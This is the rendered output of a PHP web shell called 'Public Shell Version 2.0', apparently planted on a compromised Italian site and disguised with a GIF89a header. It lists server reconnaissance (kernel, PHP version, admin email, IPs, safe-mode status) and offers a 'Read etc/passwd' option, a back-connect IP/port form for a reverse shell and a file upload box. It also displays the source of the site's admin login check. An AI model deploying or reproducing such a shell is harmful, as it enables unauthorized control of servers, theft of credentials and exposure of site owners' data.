GIF89a

Public Shell


Uname : Linux hlpi1ws-c319s08.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.110 Your IP : 3.141.28.197
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: system,popen,dl,passthru,proc_open,shell_exec
Current Path : /web/htdocs/www.giancio.com/home/admin/include/
File Upload :
Current File : /web/htdocs/www.giancio.com/home/admin/include/check.php

<?php
    session_start();
    if(!isset($_SESSION['ute_abilitato']) || !isset($_SESSION['ute_id']))//se non � settata la variabile id_utente oppure|| 'tipo' ti butta fuori
    {header('location:../login.php');
	echo "password sbagliata";
    exit();}
	 //torna a index e si blocca li
?>

Public Shell Version 2.0